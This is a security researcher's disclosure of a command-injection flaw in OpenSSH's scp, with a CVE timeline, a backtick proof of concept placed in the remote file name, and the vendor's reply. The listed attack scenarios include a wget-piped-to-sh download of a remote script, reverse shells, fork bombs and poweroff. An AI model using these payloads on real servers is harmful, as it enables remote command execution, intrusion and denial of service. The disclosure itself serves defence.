Email address : [email protected]
Linkedin : www.linkedin.com/in/chinmay-pandya
Vulnerable line: https://github.com/openssh/openssh-portable/blob/a2855c048b3f4b17d8787bd3f24232ec0cd79abe/scp.c#L989
- Issue discovered - 9 Jun 2020
- CVE obtained - 16 Jul 2020
- Vendor notified - 9 Jun 2020
- Vendor acknowledgement received - 9 Jun 2020
- Public disclosure 18 Jul 2020
scp is a program for copying files between computers. It uses the SSH protocol. It is included by default in most Linux and Unix distributions
While coping files to remote server, file path is appended at end of local scp command. For example, if you execute following command
scp SourceFile user@host:directory/TargetFileit will execute a local command
scp -t directory/TargetFileAt time of creating local scp command, it does not sanitise file name. An attacker can pass a backtick enabled payload as file name and when local scp command is executed, local shell will also execute backtick enabled payload.
Execute following command with scp
scp /sourcefile remoteserver:'`touch /tmp/exploit.sh`/targetfile'After executing this command, go to remote server and you will see in /tmp/ directory that file exploit.sh is present. Putting single quotes in file name is important to prevent payload execution on local shell or using escape character like single quotes in file name can prevent payload execution on local shell
- Scenarios where ssh is blocked for user but scp allowed by command option in authorized_keys file. You can bypass this restriction and execute command on remote server.
- SCP supports directory transfer with " -r " option. As linux allows backtick (`) in file name. attacker can create a payload in file name and when a victim is coping complete folder to remote server, payload in the file name will execute.
- Attacker can put "
poweroff" or a fork bomb in file name and it will casue server to crash or restart which will result in a DOS attack. - Attacker can get bind/reverse shell with various tricks like bash bind shell or execute sh file like "wget https://unknownsource.com/possiblydangerous.sh -O- | sh"
- As SHELL will first execute the backtick command and then will execute scp command, we can write an infinite loop in backtick which will cause socket to be open for a long time. Multiple such attacks will not leave sockets for new conntion and will result in DDOS.
The scp command is a historical protocol (called rcp) which relies upon that style of argument passing and encounters expansion problems. It has proven very difficult to add "security" to the scp model. All attempts to "detect" and "prevent" anomalous argument transfers stand a great chance of breaking existing workflows. Yes, we recognize it the situation sucks. But we don't want to break the easy patterns people use scp for, until there is a commonplace replacement. People should use rsync or something else instead if they are concerned.
Code for SCP - https://github.com/openssh/openssh-portable/blob/master/scp.c
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent